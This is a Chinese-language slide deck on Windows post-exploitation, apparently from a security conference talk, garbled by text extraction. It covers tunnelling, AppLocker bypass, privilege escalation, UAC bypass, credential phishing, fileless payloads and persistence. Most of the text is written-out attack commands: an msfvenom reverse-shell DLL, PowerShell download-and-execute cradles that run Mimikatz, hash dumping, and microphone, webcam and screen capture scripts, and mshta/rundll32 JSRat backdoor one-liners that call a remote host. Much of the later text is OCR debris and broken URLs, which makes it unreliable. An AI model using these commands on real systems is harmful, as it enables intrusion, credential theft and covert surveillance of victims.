后滲透階段的網(wǎng)絡(luò)攻防對(duì)抗

1、Shell is Only the Beginning后滲透階段的網(wǎng)絡(luò)攻防對(duì)抗As a offensive researcher, if you can dream it,someone has likely already done it and that someone isnt the kind of person who speaks at security consMatt Graeber3gstudentGood StudyGood HealthGood Attitude后滲透階段滲透測(cè)試以特定的業(yè)務(wù)系統(tǒng)作為目標(biāo)，識(shí) 別出關(guān)鍵的基礎(chǔ)設(shè)施，并尋找客 戶組織最具價(jià)值和嘗試進(jìn)行安全 保護(hù)

2、的信息和資產(chǎn)黑客攻擊黑客對(duì)攻擊戰(zhàn)果進(jìn)一步擴(kuò)大，以 及盡可能隱藏自身痕跡的過(guò)程打開(kāi)一扇窗繞過(guò)看門(mén)狗我來(lái)作主人屋里有什么挖一個(gè)密道我來(lái)抓住你Open ProxyBypass ApplicationWhitelistingEscalate PrivilegesGather InformationPersistenceDetection and Mitigations目錄打開(kāi)一扇窗Open Proxy為什么用代理?更好地接觸到目標(biāo)所處環(huán)境使用已有shell的機(jī)器作為跳板，擴(kuò)大戰(zhàn)果Its the beginning常用方法HTTP- Tunnel;Metasploit- Portpwd HTTP- Re

3、Georg; Metasploit- Socks4a端口轉(zhuǎn)發(fā)：Client- Lcx, Netsh;Socks代理：Client- Ew,Xsocks; 其他：SSH, ICMP 等Vpn！然而，我們可能會(huì)碰到這樣的情況：安裝殺毒軟件,攔截“惡意”程序設(shè)置應(yīng)用程序白名單,限制白名單以外的程序運(yùn)行 eg：Windows ApplockerWindows AppLocker簡(jiǎn)介：即“應(yīng)用程序控制策略”，可用來(lái)對(duì)可執(zhí)行程序、安裝程序和腳本進(jìn)行控制 開(kāi)啟默認(rèn)規(guī)則后，除了默認(rèn)路徑可以執(zhí)行外，其他路徑均無(wú)法執(zhí)行程序和腳本繞過(guò)看門(mén)狗Bypass Application Whitelisting繞過(guò)思路Hta

4、Office MacroCplChmPowershellRundll32 Regsvr32 RegsvcsInstallutil1、HtaMore：Mshta.exe vbscript:CreateObject(Wscript.Shell).Run(calc.exe,0,true)(window.cl ose)Mshta.exe javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WScript.Shell).run(calc.exe ,0,true);tryh.Send();b=h.Res

5、ponseText;eval(b);catch(e)new%20ActiveX Object(WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);2、Office MacroMacroRaptor：Detect malicious VBA MacrosPython/decalage/oletools/wiki/mraptor3、CplDLL/CPL:生成Payload.dll:msfvenom -p windows/meterpreter/reverse_tcp -b x00 xff lhost=32 lport=8888 -

6、f dll -o payload.dll直接運(yùn)行dll：rundll32 shell32.dll,Control_RunDLL payload.dll將dll重命名為cpl，雙擊運(yùn)行普通的dll直接改后綴名From: /tips/160424、Chm高級(jí)組合技打造“完美” 捆綁后門(mén)：/tips/14254利用系統(tǒng)CHM文件實(shí)現(xiàn)隱蔽后門(mén)：那些年我們玩過(guò)的奇技淫巧5、PowershellCommand:powershell -nop -exec bypass -c IEX (New-Objectet.WebClient).DownloadString(http:/ip:port/)Get-Cont

7、ent payload.ps1 | iexcmd.exe /K key.snk$key =BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVA gSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7

8、dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitoluf o7Ucjh+WvZAU/dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU 0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89

9、tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHc gJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3r pZ9tbLZUefrFnLNiHfVjNi53Yg4=$Content = System.Convert:FromBase64String($key) Set-Co

10、ntent key.snk -Value $Content -Encoding Byte 編譯：C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs運(yùn)行：C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe Regasm.dll ORC:WindowsMicrosoft.NETFrameworkv4.0.30319re

11、gasm.exe Regasm.dll/如果沒(méi)有管理員權(quán)限使用/U來(lái)運(yùn)行C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe /U Regasm.dll C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Regasm.dllFrom: /subTee/e1c54e1fdafc15674c9a9、InstallutilInstallUtil：編譯：C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /unsafe/platform:x6

12、4 /out:InstallUtil.exe InstallUtil.cs編譯以后用/U參數(shù)運(yùn)行：C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /U InstallUtil.exeFrom:http:/subt0 x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html/tips/886210、可執(zhí)行目錄通過(guò)ps腳本掃描可寫(xiě)入的路徑,腳本下載地址：http:/go.mssec.se/AppLockerBCFrom: /tips/1180411、最直

13、接的方式提權(quán)我來(lái)作主人Escalate Privileges常見(jiàn)的提權(quán)方式本地提權(quán)漏洞服務(wù)提權(quán)協(xié)議Phishing本地提權(quán)根據(jù)補(bǔ)丁號(hào)來(lái)確定是否存在漏洞的腳本：/GDSSecurity/Windows-Exploit-Suggester將受害者計(jì)算機(jī)systeminfo導(dǎo)出到文件:Systeminfo 1.txt使用腳本判斷存在的漏洞：python windows-exploit-suggester.py -database 2016-05-31-mssb.xls - systeminfo /Desktop/1.txt可能遇到的問(wèn)題Exp被殺！將Exp改成Powershell：http:/evi

14、1cg.me/archives/MS16-032-Windows-Privilege-Escalation.htmlDemo Time服務(wù)提權(quán)常 用 服 務(wù) ： Mssql，Mysql，Oracle，F(xiàn)tp 第 三 方 服 務(wù) ： Dll劫持，文件劫持提權(quán)腳本Powerup：/tips/11989協(xié)議提權(quán)利用已知的Windows中的問(wèn)題，以獲得本地權(quán)限提升 - Potato其利用NTLM中繼（特別是基于HTTP SMB中繼）和NBNS欺騙進(jìn)行提權(quán)。 詳情：http:/tools.pwn.ren/2016/01/17/potato-windows.htmlPhishingMSF Ask模塊：ex

15、ploit/windows/local/ask通過(guò)runas方式來(lái)誘導(dǎo)用戶通過(guò)點(diǎn)擊uac驗(yàn)證來(lái)獲取最高權(quán)限。 需要修改的msf腳本 metasploit/lib/msf/core/post/windows/runas.rbPhishing Demo3. sudo msfconsole sudo)u, )召巴 W1ndows7心中1屋里有什么Gather InformationGather Information成為了主人，或許我們需要看看屋里里面有什么？ 兩 種 情 況 ： 1：已經(jīng)提權(quán)有了最高權(quán)限，為所欲為2：未提權(quán)，用戶還有UAC保護(hù)，還不能做所有的事情Bypass UAC常用方法：使用I

16、FileOperation COM接口使用Wusa.exe的extract選項(xiàng) 遠(yuǎn)程注入SHELLCODE 到傀儡進(jìn)程 DLL劫持，劫持系統(tǒng)的DLL文件直接提權(quán)過(guò)UACPhishinghttp:/evi1cg.me/archives/Powershell_Bypass_UAC.html/?page_id=380有了權(quán)限，要做什么搜集mstsc記錄，瀏覽器歷史記錄，最近操作的文件，本機(jī)密碼等 鍵盤(pán)記錄屏幕錄像 NetripperGetPass Tips通過(guò)腳本彈出認(rèn)證窗口，讓用戶輸入賬號(hào)密碼，由此得到用戶的明文密 碼。powershell腳本如下：From:/Ridter/Pentest/blo

17、b/master/note/Powershell_MSFCapture.mdGetPass TipsMSF模塊 post/windows/gather/phish_windows_credentials更多參考Installed ProgramsStartup ItemsInstalled ServicesSecurity ServicesFile/Printer Shares DatabaseServersCertificate AuthoritySensitive DataKey-loggingScreen captureNetwork traffic captureUser Inform

18、ation System ConfigurationPassword PolicySecurity PoliciesConfigured Wireless Networks and Keys新的攻擊方法無(wú)文件無(wú)文件姿勢(shì)之(一)-Powershell屏幕監(jiān)控：powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(http:/evi1cg.me/powershell/Show-TargetScreen.ps1); Show-TargetScreen”錄音：powershell -nop -exe

19、c bypass -c “IEX (New-Object Net.WebClient).DownloadString(/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1);Get- MicrophoneAudio -Path $env:TEMPsecret.wav -Length 10 -Alias SECRET”攝像頭監(jiān)控：powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(/xorrior/Rand

20、omPS-Scripts/master/MiniEye.ps1); Capture-MiniEye -RecordTime 2 - Path $env:temphack.avi”-Path $env:temphack.avi”抓Hash:powershell IEX (New-Object Net.WebClient).DownloadString(/samratashok/nishang/master/Gather/Get-PassHashes.ps1);Get-PassHashes抓明文：powershell IEX (New-Object Net.WebClient).DownloadS

21、tring(/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz無(wú)文件姿勢(shì)之(一)-PowershellEmpire:Metasploit:無(wú)文件姿勢(shì)之(二)- jsJsRat：rundll32.exe javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WinHttp.WinHttpRequest. 5.1);h.Open(GET,:8081/connect,false);

22、tryh.S end();b=h.ResponseText;eval(b);catch(e)new%20ActiveXObject(WSc ript.Shell).Run(cmd /c taskkill /f /im rundll32.exe,0,true);From:JavaScript Backdoor /tips/11764JavaScript Phishing/tips/12386無(wú)文件姿勢(shì)之(三)- mshta啟動(dòng)JsRat：Mshta javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObj

23、ect(WinHttp.WinHttpRequest.5.1);h.Open(GET,01:9998/connect,false);tryh.Send();b=h.Res ponseText;eval(b);catch(e)new%20ActiveXObject( WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);無(wú)文件姿勢(shì)之(四)- sctSCT：regsvr32 /u /s/i:http:/urlto/calc.sctscrobj.dllCalc.sctFrom: Use SCT to

24、Bypass Application Whitelisting Protection /tips/15124無(wú)文件姿勢(shì)之(五) - wscWsc：rundll32.exe javascript:.mshtml,RunHTMLApplic ation ;document.write();GetObject(script:http:/urlto/calc.wsc)Calc.wscFrom: WSC、JSRAT and WMI Backdoor /tips/15575Demo Timeregsv32 /u /s /L00/calc.sct sc-叫）一，b魯.98挖一個(gè)密道Persistence常見(jiàn)

25、方法啟動(dòng)項(xiàng)注冊(cè)表 wmiatschtasks利用已有的第三方服務(wù)新方法Bitsadmin：需要獲得管理員權(quán)限可開(kāi)機(jī)自啟動(dòng)、間隔啟動(dòng)適用于Win7 、Win8、Server 2008及以上操作系統(tǒng)可繞過(guò)Autoruns對(duì)啟動(dòng)項(xiàng)的檢測(cè)已提交至MSRC(Microsoft Security Response Center)Demo Time汕且， 仁 ，En1t ryOp t i o 飛Autoruns - Sysinternals: www.sysin t e r na ls .c o m1-1e l p譴 嶺 謐X霄Filter: 團(tuán)Coale 竺三sI il1 LSi P rov 啦 rn已

26、Boo t E:x 眨 l.llt e巴I mage Hija也困 Appl mi t七 Me 切 ork Prnviders芯: 廠 l 氣i ：da: :飛o o 二r 芍 E v e y th in g迅 Logo rn芯 Explor erI rnt e m e t E x p lo r e r往 s中 e clu le cl T a志喝 Ser vices烏j Dr iv e r s 歸 oru n Entr.,Descri團(tuán)ionPuhilisheImage Path窗 H KLMS ystemCurrentCont心Set S ervic esc : windo ws甲Time式

27、可 2016/ 3心.em婦rive 2013/ 4/ LSI 如 are SCSI Sto 巾 ort Ori LSIPMC-Sierra Sto 巾ort Driv可 . PMC-SierraA H O I 1 . 3 D e v i c e D e悶歸n e e d M i c ro D e v i c es AM D T e c hn o lo 守層Storage Rite DriveI Co. AMO Tec hn olog ies In c .悶 vanc eal M icro D e v ic e s巳 兇 妞areA D POO歡回囚 己 m cds at 己 巳amclsbs

28、 巳 圉 am 婦 a 巴囚 已res 已S知pt e c S 壓RA I D f S 伲 . PMC-Sierra. Inc .c : windo wss, 呾em婦rive. 勾 13/7 / c : w i n do w心 哼 tem32drive . 20 1 3 /7 凡 c : windo ws亟em碼rive 2012/ 12 c : w in do wss, 呾em婦rive. 勾 13/7 / ! c : windo w心 ysl:em 32drive. 2013/7處BOM Fun中 on 2 Device Ori. 1/lfincilow s (R) Vin 7 DD K

29、 p. c : window森 炟 em立 如 e 勾 13/ 8-/巳 鹵 bcmfn2巳 圉 e 1i 如 .ress回 兇 G PIOlnt el( R) Gig已b it 壓 a團(tuán) e r N D I . . Int e l C o rp o rat ion lnt el(R) 悶 om汀M) Proc.e sso . Int e l Corpo rat ion硝 H KLMS oft ware Micros吮 V.in do w s N TCurrentVersion Drive志 2c : w in do wss, 壺 m婦rive. 2013/ 3.名 c : w in do w

30、ss, 如 m32drive. 2013-/ 6. 名2016/ 3心.巳 口 msacm J華 c mM PEG 匼如-3 Audio Code .回vid c .c vidO n ep已K織 扁紨碼器F 厄 urlh m 旬Radius Inc .n stitut lntegriert. _. c : w in do wsw., 如 m32J3c o. _ _ 20 1 3 / & 名c : window心 如 m立 如 cvi. 2013-/ a,丘硝 H KL MS O 百 W AREO asses HtmlfileS hell OpenCo mmand( Default)巳 急 C: Program Fil. Int em et 巳平lo 面M ic ros忒t CC!I巾 C!Jrat i C!Jnc : p m g ra m fi l e s j nt e m et 這嘟 H KLMS ystemCurrentContro1S et S ervic es l/lfin Sock 2 Parameters Protoc ol_Catalog嘆 畫(huà) alog _Entri